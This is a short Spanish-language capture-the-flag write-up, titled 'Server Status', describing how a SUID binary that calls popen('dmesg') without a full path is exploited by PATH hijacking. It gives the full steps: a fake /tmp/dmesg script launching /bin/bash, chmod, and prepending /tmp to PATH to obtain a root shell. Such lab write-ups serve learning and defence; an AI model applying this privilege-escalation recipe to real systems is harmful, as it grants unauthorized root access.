Server Status


July 11, 20251 minute

Para este reto se proporcionaban credenciales de ssh.

hacker@88110e7a3727:~$ ./server_status
=== Server Status Monitor v1.0 ===
System diagnostic tool with root privileges

Running with elevated privileges (UID: 0, GID: 0)
Initializing...
Hacking Nasa...
****************************************
Done!
=== Command Output ===
dmesg: read kernel buffer failed: Operation not permitted
=== End of Output ===

System status check completed successfully!

Al entrar al ssh salta a la vista server_status un progrma con permisos SUID

En la función principal se llama a otra función pasandole dmesg

iVar1 = FUN_001015b0("dmesg");

Después en esta otra función lo ejecuta

__stream = popen(command,"r");

El comando se ejecuta sin la ruta completa así que se puede hacer un path hijacking

1- Dentro de /tmp se crea un archivo de nombre dmesg con

#!/bin/bash

/bin/bash

2- Se le da permisos de ejecución

chmod +x dmesg

3- Se modifica el PATH

export PATH=/tmp:$PATH

Al ejecutarlo aparece una shell como root.